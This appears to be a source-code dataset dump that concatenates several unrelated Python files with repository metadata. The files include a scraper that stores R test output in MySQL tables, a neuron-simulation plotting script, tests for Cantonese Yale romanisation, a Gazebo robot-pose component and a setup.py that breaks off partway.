trpr.row['stdouterr'] = MySQLdb.escape_string(f.read().replace('\n', ''))
trpr.row['contaminated'] = self.contaminated
trpr.row['contamination_message'] = self.contamination_message
trpr.row.update(self.__scrape_phase_result__())
trpr.update()
def __scrape_phase_result__(self):
phase_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
phase_r = json.loads(line)
flag = False
break
if "PHASE RESULT" in line and "print" not in line:
flag = True
self.did_correct_pass = int(phase_r['phase_result']['correctness_passed'])
self.did_time_pass = int(phase_r['phase_result']['timing_passed'])
return phase_r['phase_result']
def __get_predict_type__(self, type_candidate):
"""
Returns the type: 'parse', 'model', 'predict'
"""
print "TYPE CANDIDATE: " + type_candidate
types = ['binomial', 'regression', 'multinomial', 'cm']
rf = type_candidate.lower()
print "RETURNING TYPE: " + str( [t for t in types if t in rf])
return [t for t in types if t in rf]
def __switch__(self):
"""
Overrides the __switch__ method of the parent class.
This switch method handles the different types of math
results: regression, multionomial classification, CM result,
binomial classification
Multinomial classification is the only case where there will
be multiple rows inserted, all other results constitute a single row
in their respective tables.
One important note is that the scrapers in this case handle the
database insertions.
"""
print "SWITCHING TO " + self.result_type
obj = {'regression' : self.__scrape_regression_result__,
'cm' : self.__scrape_cm_result__,
'multinomial': self.__scrape_multinomial_result__,
'binomial' : self.__scrape_binomial_result__,
'comparison' : self.__scrape_comparison_result__,
}.get(self.result_type, "bad key")
if self.result_type in ['multinomial', 'binomial']:
self.__scrape_cm_result__()
return obj()
def __scrape_regression_result__(self):
regression_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
regression_r = json.loads(line)
flag = False
break
if "REGRESSION" in line and "print" not in line:
flag = True
#do the insert
def __scrape_cm_result__(self):
cm_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
cm_r = json.loads(line)
flag = False
break
if "CM RESULTS JSON" in line and "print" not in line:
flag = True
self.test_run_cm_result = TableRow("test_run_cm_result", self.perfdb)
self.test_run_cm_result.row.update(cm_r["cm_json"])
self.test_run_cm_result.update()
def __scrape_binomial_result__(self):
binomial_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
binomial_r = json.loads(line)
flag = False
break
if "BINOMIAL" in line and "print" not in line:
flag = True
self.test_run_binomial_classification_result = TableRow("test_run_binomial_classification_result", self.perfdb)
self.test_run_binomial_classification_result.row.update(binomial_r['binomial_result'])
self.test_run_binomial_classification_result.update()
return None
def __scrape_multinomial_result__(self):
multinomial_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
multinomial_r = json.loads(line)
flag = False
break
if "MULTINOMIAL" in line and "print" not in line:
flag = True
for level in multinomial_r["multinomial_result"]:
self.test_run_multinomial_classification_result = TableRow("test_run_multinomial_classification_result", self.perfdb)
self.test_run_multinomial_classification_result.row.update(level)
self.test_run_multinomial_classification_result.update()
def __scrape_comparison_result__(self):
comparison_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
comparison_r = json.loads(line)
flag = False
break
if "COMPARISON" in line and "print" not in line:
flag = True
self.test_run_binomial_comparison_result = TableRow("test_run_binomial_comparison", self.perfdb)
self.test_run_binomial_comparison_result.row.update(comparison_r['comparison_result'])
self.test_run_binomial_comparison_result.update()
| 40.207709 | 129 | 0.598445 | from Table import *
import json
import os
import re
import subprocess
import time
import MySQLdb
class Scraper:
"""
Objects of this class scrape the R stdouterr for
relevant information that needs to percolate back
to the database.
Because of the different phases (parse, model, predict),
there is a switch that redirects control to a subclass
scraper of the appropriate type.
Each phase will insert a row into the test_run_phase_result
table in the db, and possibly percolate pieces of the test_run
table back to the PerfRunner object.
Some subclasses of the Scraper will insert data into the math results tables.
"""
def __init__(self, perfdb, phase, test_dir, test_short_dir, output_dir, output_file_name):
self.perfdb = perfdb
self.phase = phase
self.test_dir = test_dir
self.test_short_dir = test_short_dir
self.output_dir = output_dir
self.output_file_name = output_file_name
self.did_time_pass = 0
self.did_correct_pass = 0
self.contaminated = 0
self.contamination_message = ""
def scrape(self):
"""
Switches out to the phase scraper for scraping R output.
The subclass object is then invoked and an object with
table information is percolated back to the caller.
"""
phase_scraper = self.__switch__()
res = phase_scraper.invoke()
self.did_time_pass = phase_scraper.did_time_pass
self.did_correct_pass = phase_scraper.did_correct_pass
self.contaminated = phase_scraper.contaminated
self.contamination_message = phase_scraper.contamination_message
return res
def __switch__(self):
"""
Switch to scraper for the appropriate phase.
"""
return {
'parse': ParseScraper(self),
'model': ModelScraper(self),
'predict': PredictScraper(self),
}[self.phase]
class ParseScraper(Scraper):
"""
An object that performs the scraping for the Parse phase.
Relevant tables and their fields:
>test_run:
[dataset_name, dataset_source, train_dataset_url, test_dataset_url]
>test_run_phase_result:
[phase_name, start/end_epoch_ms, stdouterr, passed, correctness_passed,
timing_passed, contaminated, contamination_message]
"""
def __init__(self, object):
self.perfdb = object.perfdb
self.phase = object.phase
self.test_dir = object.test_dir
self.test_short_dir = object.test_short_dir
self.output_dir = object.output_dir
self.output_file_name = object.output_file_name
self.contamination = os.path.join(self.output_dir, "contamination_message")
self.contaminated = 1 if os.path.exists(self.contamination) else 0
self.contamination_message = "No contamination."
if self.contaminated:
with open(self.contamination, "r") as f:
self.contamination_message = MySQLdb.escape_string(f.read().replace('\n', ''))
self.did_correct_pass = 0
self.did_time_pass = 0
self.test_run = {
'dataset_source': '',
'train_dataset_url': '',
'test_dataset_url': '',
}
def invoke(self):
"""
Scrapes the stdouterr from the R phase. Inserts into results tables.
The phase result is handled in the __init__ of this object.
The work be done here is on the self.test_run dictionary
@return: test_run dictionary
"""
self.insert_phase_result()
self.test_run.update(self.__scrape_parse_result__())
return self.test_run
def insert_phase_result(self):
trpr = TableRow("test_run_phase_result", self.perfdb)
with open(self.output_file_name, "r") as f:
trpr.row['stdouterr'] = MySQLdb.escape_string(f.read().replace('\n', ''))
trpr.row['contaminated'] = self.contaminated
trpr.row['contamination_message'] = self.contamination_message
trpr.row.update(self.__scrape_phase_result__())
trpr.update()
def __scrape_phase_result__(self):
phase_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
phase_r = json.loads(line)
flag = False
break
if "PHASE RESULT" in line and "print" not in line:
flag = True
self.did_correct_pass = int(phase_r['phase_result']['correctness_passed'])
self.did_time_pass = int(phase_r['phase_result']['timing_passed'])
return phase_r['phase_result']
def __scrape_parse_result__(self):
parse_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
parse_r = json.loads(line)
flag = False
break
if "PARSE RESULT" in line and "print" not in line:
flag = True
return parse_r['parse_result']
class ModelScraper(Scraper):
"""
An object that performs the scraping for the Model phase.
Relevant tables and their fields:
>test_run_clustering_result:
[k, withinss]
>test_run_model_result:
[model_json]
>test_run_phase_result:
[phase_name, start/end_epoch_ms, stdouterr, passed, correctness_passed,
timing_passed, contaminated, contamination_message]
"""
def __init__(self, object):
self.perfdb = object.perfdb
self.phase = object.phase
self.test_dir = object.test_dir
self.test_short_dir = object.test_short_dir
self.output_dir = object.output_dir
self.output_file_name = object.output_file_name
self.contamination = os.path.join(self.output_dir, "contamination_message")
self.contaminated = 1 if os.path.exists(self.contamination) else 0
self.contamination_message = "No contamination."
if self.contaminated:
with open(self.contamination, "r") as f:
self.contamination_message = MySQLdb.escape_string(f.read().replace('\n', ''))
self.did_correct_pass = 0
self.did_time_pass = 0
self.test_run_model_result = TableRow("test_run_model_result", self.perfdb)
def invoke(self):
"""
Scrapes the stdouterr from the R phase. Inserts into results tables.
Additionally handles the KMeans clustering results table.
@return: None
"""
self.insert_phase_result()
kmeans_result = self.__scrape_kmeans_result__()
if kmeans_result:
self.test_run_clustering_result = TableRow("test_run_clustering_result", self.perfdb)
self.test_run_clustering_result.row.update(kmeans_result)
self.test_run_clustering_result.update()
comp_result = self.__scrape_comparison_result__()
if comp_result != "":
self.test_run_binomial_comparison_result = TableRow("test_run_binomial_comparison", self.perfdb)
self.test_run_binomial_comparison_result.row.update(comp_result['comparison_result'])
self.test_run_binomial_comparison_result.update()
else:
self.test_run_model_result.row['model_json'] = \
MySQLdb.escape_string(str(self.__scrape_model_result__()))
self.test_run_model_result.update()
return None
def insert_phase_result(self):
trpr = TableRow("test_run_phase_result", self.perfdb)
with open(self.output_file_name, "r") as f:
trpr.row['stdouterr'] = MySQLdb.escape_string(f.read().replace('\n', ''))
trpr.row['contaminated'] = self.contaminated
trpr.row['contamination_message'] = self.contamination_message
trpr.row.update(self.__scrape_phase_result__())
trpr.update()
def __scrape_comparison_result__(self):
comparison_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
comparison_r = json.loads(line)
flag = False
break
if "COMPARISON" in line and "print" not in line:
flag = True
return comparison_r
def __scrape_phase_result__(self):
phase_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
phase_r = json.loads(line)
flag = False
break
if "PHASE RESULT" in line and "print" not in line:
flag = True
self.did_correct_pass = int(phase_r['phase_result']['correctness_passed'])
self.did_time_pass = int(phase_r['phase_result']['timing_passed'])
return phase_r['phase_result']
def __scrape_kmeans_result__(self):
kmeans_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
kmeans_r = json.loads(line)
flag = False
break
if "KMEANS RESULT" in line and "print" not in line:
flag = True
return None if kmeans_r["kmeans_result"]["k"] == "None" else kmeans_r["kmeans_result"]
def __scrape_model_result__(self):
model_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
model_r = json.loads(line)
flag = False
break
if "MODEL RESULT" in line and "print" not in line:
flag = True
return model_r["model_result"]["model_json"]
class PredictScraper(Scraper):
"""
An object that performs the scraping for the Predict phase.
This object is not awlays used, e.g. in the case of KMeans and PCA,
there is no prediction phase, but the results still need to be
verified.
Relevant tables and their fields:
>test_run_binomial_classification_result:
[auc, precision, recall, error_rate, minoriy_error_rate]
>test_run_cm_result:
[levels_json, cm_json, representation]
>test_run_multinomial_classification_result:
[level, level_actual_count, level_predicted_correctly_count, level_error_rate]
>test_run_phase_result:
[phase_name, start/end_epoch_ms, stdouterr, passed, correctness_passed,
timing_passed, contaminated, contamination_message]
>test_run_regression_result:
[aic, null_deviance, residual_deviance]
"""
def __init__(self, object):
self.perfdb = object.perfdb
self.phase = object.phase
self.test_dir = object.test_dir
self.test_short_dir = object.test_short_dir
self.output_dir = object.output_dir
self.output_file_name = object.output_file_name
self.contamination = os.path.join(self.output_dir, "contamination_message")
self.contaminated = 1 if os.path.exists(self.contamination) else 0
self.contamination_message = "No contamination."
if self.contaminated:
with open(self.contamination, "r") as f:
self.contamination_message = MySQLdb.escape_string(f.read().replace('\n', ''))
self.did_correct_pass = 0
self.did_time_pass = 0
self.test_run_binomial_classification_result = ""
self.test_run_cm_result = ""
self.test_run_phase_result = ""
self.test_run_regression_result = ""
self.test_run_binomial_comparison_result = ""
self.test_run_multinomial_classification_result = ""
def invoke(self):
"""
Scrapes the stdouterr from the R phase.
This invoke method will pass off control to the appropriate result scraper
using the __switch__ override.
Some preliminary scraping will be done here to obtain the correct result type.
@return: None
"""
self.insert_phase_result()
predict_type = ""
return None
def insert_phase_result(self):
trpr = TableRow("test_run_phase_result", self.perfdb)
with open(self.output_file_name, "r") as f:
trpr.row['stdouterr'] = MySQLdb.escape_string(f.read().replace('\n', ''))
trpr.row['contaminated'] = self.contaminated
trpr.row['contamination_message'] = self.contamination_message
trpr.row.update(self.__scrape_phase_result__())
trpr.update()
def __scrape_phase_result__(self):
phase_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
phase_r = json.loads(line)
flag = False
break
if "PHASE RESULT" in line and "print" not in line:
flag = True
self.did_correct_pass = int(phase_r['phase_result']['correctness_passed'])
self.did_time_pass = int(phase_r['phase_result']['timing_passed'])
return phase_r['phase_result']
def __get_predict_type__(self, type_candidate):
"""
Returns the type: 'parse', 'model', 'predict'
"""
print "TYPE CANDIDATE: " + type_candidate
types = ['binomial', 'regression', 'multinomial', 'cm']
rf = type_candidate.lower()
print "RETURNING TYPE: " + str( [t for t in types if t in rf])
return [t for t in types if t in rf]
def __switch__(self):
"""
Overrides the __switch__ method of the parent class.
This switch method handles the different types of math
results: regression, multionomial classification, CM result,
binomial classification
Multinomial classification is the only case where there will
be multiple rows inserted, all other results constitute a single row
in their respective tables.
One important note is that the scrapers in this case handle the
database insertions.
"""
print "SWITCHING TO " + self.result_type
obj = {'regression' : self.__scrape_regression_result__,
'cm' : self.__scrape_cm_result__,
'multinomial': self.__scrape_multinomial_result__,
'binomial' : self.__scrape_binomial_result__,
'comparison' : self.__scrape_comparison_result__,
}.get(self.result_type, "bad key")
if self.result_type in ['multinomial', 'binomial']:
self.__scrape_cm_result__()
return obj()
def __scrape_regression_result__(self):
regression_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
regression_r = json.loads(line)
flag = False
break
if "REGRESSION" in line and "print" not in line:
flag = True
def __scrape_cm_result__(self):
cm_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
cm_r = json.loads(line)
flag = False
break
if "CM RESULTS JSON" in line and "print" not in line:
flag = True
self.test_run_cm_result = TableRow("test_run_cm_result", self.perfdb)
self.test_run_cm_result.row.update(cm_r["cm_json"])
self.test_run_cm_result.update()
def __scrape_binomial_result__(self):
binomial_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
binomial_r = json.loads(line)
flag = False
break
if "BINOMIAL" in line and "print" not in line:
flag = True
self.test_run_binomial_classification_result = TableRow("test_run_binomial_classification_result", self.perfdb)
self.test_run_binomial_classification_result.row.update(binomial_r['binomial_result'])
self.test_run_binomial_classification_result.update()
return None
def __scrape_multinomial_result__(self):
multinomial_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
multinomial_r = json.loads(line)
flag = False
break
if "MULTINOMIAL" in line and "print" not in line:
flag = True
for level in multinomial_r["multinomial_result"]:
self.test_run_multinomial_classification_result = TableRow("test_run_multinomial_classification_result", self.perfdb)
self.test_run_multinomial_classification_result.row.update(level)
self.test_run_multinomial_classification_result.update()
def __scrape_comparison_result__(self):
comparison_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
comparison_r = json.loads(line)
flag = False
break
if "COMPARISON" in line and "print" not in line:
flag = True
self.test_run_binomial_comparison_result = TableRow("test_run_binomial_comparison", self.perfdb)
self.test_run_binomial_comparison_result.row.update(comparison_r['comparison_result'])
self.test_run_binomial_comparison_result.update()
| false | true |
1c4a7c6f7957c6d59fda330bbe04e8fea41006a6 | 1,933 | py | Python | plots/cv_over_a/qif/plot.py | ModelDBRepository/228604 | 8f641f73bcac2700b476663fe656fcad7d63470d | [
"BSD-3-Clause"
] | null | null | null | plots/cv_over_a/qif/plot.py | ModelDBRepository/228604 | 8f641f73bcac2700b476663fe656fcad7d63470d | [
"BSD-3-Clause"
] | null | null | null | plots/cv_over_a/qif/plot.py | ModelDBRepository/228604 | 8f641f73bcac2700b476663fe656fcad7d63470d | [
"BSD-3-Clause"
] | null | null | null | import analytics.shot_noise_driven.if_neuron as ana
import analytics.gaussian_white_noise_driven.if_neuron as gwnana
import pylab as pl
import numpy as np
import param_scan.io
import param_scan.parameter_sets
import param_scan.simulation_run
from param_scan.io import InDirectory
import os
from latex_param_values import LatexParamValues
from grace_plot import GracePlot
def with_tau_m(tau_m, prms):
""" convert back from dimnesionless units """
p = dict(prms)
p["tau_m"] = tau_m
p["rin_e"] = prms["rin_e"] / tau_m
p["tr"] = prms["tr"] * tau_m
p["df"] = prms["df"] / tau_m
p["dt"] = prms["dt"] * tau_m
p["f_c"] = prms["f_c"] / tau_m
p["f_max"] = prms["f_max"] / tau_m
p["f_sig"] = prms["f_sig"] / tau_m
p["r_sample"] = prms["r_sample"] / tau_m
return p
tau_m = 0.02 # s
with InDirectory(os.path.abspath(__file__)):
rfn, r = param_scan.io.load_newest_run(d="./sim")
prms = r["parameters"]
rfn_theo, r_theo = param_scan.io.load_newest_run_matching({}, d="./theo")
rfn_da, r_da = param_scan.io.load_newest_run_matching({}, d="./diffapp")
gr = GracePlot("plot")
a, rin_e, cv = param_scan.simulation_run.read_values(r, param_scan.parameter_sets.unroll(prms), ["a_e", "rin_e", "cv"], "stdout", ignore_errors=True)
gr.plot(a, cv)
a_theo, rin_e_theo, cv_theo = param_scan.simulation_run.read_values(r_theo, param_scan.parameter_sets.unroll(r_theo["parameters"]), ["a_e", "rin_e", "cv"], "stdout", ignore_errors=True)
gr.plot(a_theo, cv_theo)
a_da, rin_e_da, cv_da = param_scan.simulation_run.read_values(r_da, param_scan.parameter_sets.unroll(r_da["parameters"]), ["a_e", "rin_e", "cv"], "stdout", ignore_errors=True)
gr.plot(a_da, cv_da)
gr.plot(a_theo, [1 for a in a_theo])
gr.plot(a_theo, [1./3**0.5 for a in a_theo])
gr.save()
LatexParamValues().write("paramvalues.tex", with_tau_m(tau_m * 1000, prms))
| 37.173077 | 189 | 0.682359 | import analytics.shot_noise_driven.if_neuron as ana
import analytics.gaussian_white_noise_driven.if_neuron as gwnana
import pylab as pl
import numpy as np
import param_scan.io
import param_scan.parameter_sets
import param_scan.simulation_run
from param_scan.io import InDirectory
import os
from latex_param_values import LatexParamValues
from grace_plot import GracePlot
def with_tau_m(tau_m, prms):
p = dict(prms)
p["tau_m"] = tau_m
p["rin_e"] = prms["rin_e"] / tau_m
p["tr"] = prms["tr"] * tau_m
p["df"] = prms["df"] / tau_m
p["dt"] = prms["dt"] * tau_m
p["f_c"] = prms["f_c"] / tau_m
p["f_max"] = prms["f_max"] / tau_m
p["f_sig"] = prms["f_sig"] / tau_m
p["r_sample"] = prms["r_sample"] / tau_m
return p
tau_m = 0.02
with InDirectory(os.path.abspath(__file__)):
rfn, r = param_scan.io.load_newest_run(d="./sim")
prms = r["parameters"]
rfn_theo, r_theo = param_scan.io.load_newest_run_matching({}, d="./theo")
rfn_da, r_da = param_scan.io.load_newest_run_matching({}, d="./diffapp")
gr = GracePlot("plot")
a, rin_e, cv = param_scan.simulation_run.read_values(r, param_scan.parameter_sets.unroll(prms), ["a_e", "rin_e", "cv"], "stdout", ignore_errors=True)
gr.plot(a, cv)
a_theo, rin_e_theo, cv_theo = param_scan.simulation_run.read_values(r_theo, param_scan.parameter_sets.unroll(r_theo["parameters"]), ["a_e", "rin_e", "cv"], "stdout", ignore_errors=True)
gr.plot(a_theo, cv_theo)
a_da, rin_e_da, cv_da = param_scan.simulation_run.read_values(r_da, param_scan.parameter_sets.unroll(r_da["parameters"]), ["a_e", "rin_e", "cv"], "stdout", ignore_errors=True)
gr.plot(a_da, cv_da)
gr.plot(a_theo, [1 for a in a_theo])
gr.plot(a_theo, [1./3**0.5 for a in a_theo])
gr.save()
LatexParamValues().write("paramvalues.tex", with_tau_m(tau_m * 1000, prms))
| true | true |
1c4a7c8b617700a230076e999868d1a98b6e2fb1 | 312 | py | Python | desafios/Ex023.py | FelipeAlafy/Python | da2374e55e8aa84e4ca6d9c7bf8dafeb546a4742 | [
"MIT"
] | null | null | null | desafios/Ex023.py | FelipeAlafy/Python | da2374e55e8aa84e4ca6d9c7bf8dafeb546a4742 | [
"MIT"
] | null | null | null | desafios/Ex023.py | FelipeAlafy/Python | da2374e55e8aa84e4ca6d9c7bf8dafeb546a4742 | [
"MIT"
] | null | null | null | num = int(input("Digite um número entre 0 e 9999: "))
u = num // 1 % 10
d = num // 10 % 10
c = num // 100 % 10
m = num // 1000 % 10
print("\033[36munidade: {}\033[m".format(u))
print("\033[33mdezena: {}\033[m".format(d))
print("\033[32mcentena: {}\033[m".format(c))
print("\033[31mmilhar: {}\033[m".format(m))
| 31.2 | 53 | 0.589744 | num = int(input("Digite um número entre 0 e 9999: "))
u = num // 1 % 10
d = num // 10 % 10
c = num // 100 % 10
m = num // 1000 % 10
print("\033[36munidade: {}\033[m".format(u))
print("\033[33mdezena: {}\033[m".format(d))
print("\033[32mcentena: {}\033[m".format(c))
print("\033[31mmilhar: {}\033[m".format(m))
| true | true |
1c4a7c8d6ad4b05645b9c03988afe18bb514fbae | 59 | py | Python | packages/Python/modern_robotics/__init__.py | Nutellaman/ModernRobotics | 88c94eec1e0e4eedbd3ae32819664179a9a5a6ba | [
"MIT"
] | 1,126 | 2016-10-10T19:04:47.000Z | 2022-03-31T21:22:58.000Z | packages/Python/modern_robotics/__init__.py | Nutellaman/ModernRobotics | 88c94eec1e0e4eedbd3ae32819664179a9a5a6ba | [
"MIT"
] | 34 | 2017-10-11T04:52:38.000Z | 2022-03-17T18:23:05.000Z | packages/Python/modern_robotics/__init__.py | Nutellaman/ModernRobotics | 88c94eec1e0e4eedbd3ae32819664179a9a5a6ba | [
"MIT"
] | 631 | 2016-10-11T03:43:36.000Z | 2022-03-24T21:41:47.000Z | from .__version__ import __version__
from .core import *
| 11.8 | 36 | 0.779661 | from .__version__ import __version__
from .core import *
| true | true |
1c4a7cf006f6295e328795766e19f2fe14ead264 | 2,259 | py | Python | examples/brainsimulator_agent/components/visual_area_component.py | masayoshi-nakamura/CognitiveArchitectureLecture | 5e036b48e92f266062eb7be8a366e754dee24f2c | [
"Apache-2.0"
] | 4 | 2016-03-13T03:01:28.000Z | 2016-03-31T02:51:56.000Z | examples/brainsimulator_agent/components/visual_area_component.py | masayoshi-nakamura/CognitiveArchitectureLecture | 5e036b48e92f266062eb7be8a366e754dee24f2c | [
"Apache-2.0"
] | null | null | null | examples/brainsimulator_agent/components/visual_area_component.py | masayoshi-nakamura/CognitiveArchitectureLecture | 5e036b48e92f266062eb7be8a366e754dee24f2c | [
"Apache-2.0"
] | null | null | null |
import brica1
import numpy as np
import pygazebo.msg.poses_stamped_pb2
import pickle
class VisualAreaComponent(brica1.Component):
def __init__(self):
super(VisualAreaComponent, self).__init__()
self.last_position = np.array((0, 0))
def __position_to_area_id(self, pos2d):
x = pos2d[0]
y = pos2d[1]
radius = 1
maze_width = 1
if x*x + y*y < radius*radius:
return (0, 0)
areaIdX = 0
if x < maze_width*0.5:
areaIdX = -1
if x > maze_width*0.5:
areaIdX = 1
areaIdY = 0
if y < maze_width*0.5:
areaIdY = -1
if y > maze_width*0.5:
areaIdY = 1
return (areaIdX, areaIdY)
def get_server_response(self):
return self.server_response
def callback(self, data):
pose = pygazebo.msg.poses_stamped_pb2.PosesStamped()
message = pose.FromString(data)
turtlebot_id = 0
if message.pose[turtlebot_id].name != "turtlebot":
raise Exception("message.pose[0].name is not turtlbot")
position = np.array((
message.pose[turtlebot_id].position.x,
message.pose[turtlebot_id].position.y))
orientation = np.array((
message.pose[turtlebot_id].orientation.x,
message.pose[turtlebot_id].orientation.y,
message.pose[turtlebot_id].orientation.z,
message.pose[turtlebot_id].orientation.w))
vel = self.last_position - position
self.last_position = position
self.set_state("out_body_velocity",
np.array((vel[0], vel[1])).astype(np.float32))
self.set_state("out_body_position",
position.astype(np.float32))
self.set_state("out_body_orientation",
orientation.astype(np.float32))
self.server_response = {"out_body_velocity":vel.tolist(),
"out_body_position":position.tolist(),
"out_body_orientation":orientation.tolist()}
#print self.server_response
def fire(self):
for key in self.states.keys():
self.results[key] = self.states[key]
| 31.375 | 76 | 0.575476 |
import brica1
import numpy as np
import pygazebo.msg.poses_stamped_pb2
import pickle
class VisualAreaComponent(brica1.Component):
def __init__(self):
super(VisualAreaComponent, self).__init__()
self.last_position = np.array((0, 0))
def __position_to_area_id(self, pos2d):
x = pos2d[0]
y = pos2d[1]
radius = 1
maze_width = 1
if x*x + y*y < radius*radius:
return (0, 0)
areaIdX = 0
if x < maze_width*0.5:
areaIdX = -1
if x > maze_width*0.5:
areaIdX = 1
areaIdY = 0
if y < maze_width*0.5:
areaIdY = -1
if y > maze_width*0.5:
areaIdY = 1
return (areaIdX, areaIdY)
def get_server_response(self):
return self.server_response
def callback(self, data):
pose = pygazebo.msg.poses_stamped_pb2.PosesStamped()
message = pose.FromString(data)
turtlebot_id = 0
if message.pose[turtlebot_id].name != "turtlebot":
raise Exception("message.pose[0].name is not turtlbot")
position = np.array((
message.pose[turtlebot_id].position.x,
message.pose[turtlebot_id].position.y))
orientation = np.array((
message.pose[turtlebot_id].orientation.x,
message.pose[turtlebot_id].orientation.y,
message.pose[turtlebot_id].orientation.z,
message.pose[turtlebot_id].orientation.w))
vel = self.last_position - position
self.last_position = position
self.set_state("out_body_velocity",
np.array((vel[0], vel[1])).astype(np.float32))
self.set_state("out_body_position",
position.astype(np.float32))
self.set_state("out_body_orientation",
orientation.astype(np.float32))
self.server_response = {"out_body_velocity":vel.tolist(),
"out_body_position":position.tolist(),
"out_body_orientation":orientation.tolist()}
def fire(self):
for key in self.states.keys():
self.results[key] = self.states[key]
| true | true |
1c4a7d5d68e7e6f208af698969098f6dd360551f | 932 | py | Python | pycantonese/tests/test_yale.py | chaaklau/pycantonese | 94694fea2f3c3405d3b6bb6d504a56bb05a6496c | [
"MIT"
] | 124 | 2019-08-12T13:10:43.000Z | 2022-03-24T18:35:58.000Z | pycantonese/tests/test_yale.py | chaaklau/pycantonese | 94694fea2f3c3405d3b6bb6d504a56bb05a6496c | [
"MIT"
] | 13 | 2019-09-03T17:08:49.000Z | 2021-12-28T21:37:17.000Z | pycantonese/tests/test_yale.py | chaaklau/pycantonese | 94694fea2f3c3405d3b6bb6d504a56bb05a6496c | [
"MIT"
] | 15 | 2019-08-09T04:03:01.000Z | 2022-03-17T10:18:21.000Z | import pytest
from pycantonese import jyutping_to_yale
from pycantonese.jyutping.parse_jyutping import ONSETS, NUCLEI, CODAS
from pycantonese.jyutping.yale import (
ONSETS_YALE,
NUCLEI_YALE,
CODAS_YALE,
)
def test_correct_onset_set():
assert set(ONSETS_YALE.keys()) == ONSETS
def test_correct_nucleus_set():
assert set(NUCLEI_YALE.keys()) == NUCLEI
def test_correct_coda_set():
assert set(CODAS_YALE.keys()) == CODAS
@pytest.mark.parametrize("input_", ["", None])
def test_null_input(input_):
assert jyutping_to_yale(input_) == []
@pytest.mark.parametrize("input_", ["", None])
def test_null_input_as_list_false(input_):
assert jyutping_to_yale(input_, as_list=False) == ""
def test_jyutping_to_yale_m4goi1():
assert jyutping_to_yale("m4goi1") == ["m̀h", "gōi"]
def test_jyutping_to_yale_gwong2dung1waa2():
assert jyutping_to_yale("gwong2dung1waa2") == ["gwóng", "dūng", "wá"]
| 23.3 | 73 | 0.73176 | import pytest
from pycantonese import jyutping_to_yale
from pycantonese.jyutping.parse_jyutping import ONSETS, NUCLEI, CODAS
from pycantonese.jyutping.yale import (
ONSETS_YALE,
NUCLEI_YALE,
CODAS_YALE,
)
def test_correct_onset_set():
assert set(ONSETS_YALE.keys()) == ONSETS
def test_correct_nucleus_set():
assert set(NUCLEI_YALE.keys()) == NUCLEI
def test_correct_coda_set():
assert set(CODAS_YALE.keys()) == CODAS
@pytest.mark.parametrize("input_", ["", None])
def test_null_input(input_):
assert jyutping_to_yale(input_) == []
@pytest.mark.parametrize("input_", ["", None])
def test_null_input_as_list_false(input_):
assert jyutping_to_yale(input_, as_list=False) == ""
def test_jyutping_to_yale_m4goi1():
assert jyutping_to_yale("m4goi1") == ["m̀h", "gōi"]
def test_jyutping_to_yale_gwong2dung1waa2():
assert jyutping_to_yale("gwong2dung1waa2") == ["gwóng", "dūng", "wá"]
| true | true |
1c4a7d8f4b20f462196786fe00a5de5533884057 | 184 | py | Python | molsysmt/tools/openmm_Modeller/is_openmm_Modeller.py | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | molsysmt/tools/openmm_Modeller/is_openmm_Modeller.py | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | molsysmt/tools/openmm_Modeller/is_openmm_Modeller.py | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | _item_fullname_='openmm.Modeller'
def is_openmm_Modeller(item):
item_fullname = item.__class__.__module__+'.'+item.__class__.__name__
return _item_fullname_==item_fullname
| 20.444444 | 73 | 0.788043 | _item_fullname_='openmm.Modeller'
def is_openmm_Modeller(item):
item_fullname = item.__class__.__module__+'.'+item.__class__.__name__
return _item_fullname_==item_fullname
| true | true |
1c4a7e2fe78d848f06c3a08a7f2a2ea29679e094 | 1,158 | py | Python | setup.py | topshed/m8tricks | 51a55f0cdbb167252048101bc2aadf547a5730da | [
"MIT"
] | 10 | 2019-07-31T17:33:10.000Z | 2022-01-08T09:07:01.000Z | setup.py | topshed/m8tricks | 51a55f0cdbb167252048101bc2aadf547a5730da | [
"MIT"
] | 3 | 2019-08-18T19:25:20.000Z | 2022-01-07T12:19:23.000Z | setup.py | topshed/m8tricks | 51a55f0cdbb167252048101bc2aadf547a5730da | [
"MIT"
] | 1 | 2022-01-08T09:03:42.000Z | 2022-01-08T09:03:42.000Z | "Setup script for the m8tricks package"
import sys
from setuptools import setup, find_packages
if not sys.version_info >= (3, 5):
raise RuntimeError('This application requires Python 3.5 or later')
def main():
"Executes setup when this script is the top-level"
import m8tricks as app
from pathlib import Path
with Path(__file__).with_name('project.rst').open() as project:
setup(
name=app.__project__,
version=app.__version__,
description=app.__doc__,
long_description=project.read(),
classifiers=app.__classifiers__,
author=app.__author__,
author_email=app.__author_email__,
url=app.__url__,
license=[
c.rsplit('::', 1)[1].strip()
for c in app.__classifiers__
if c.startswith('License ::')
][0],
keywords=app.__keywords__,
packages=find_packages(),
include_package_data=True,
install_requires=app.__requires__,
entry_points=app.__entry_points__,
)
if __name__ == '__main__':
main()
| 28.95 | 71 | 0.598446 |
import sys
from setuptools import setup, find_packages
if not sys.version_info >= (3, 5):
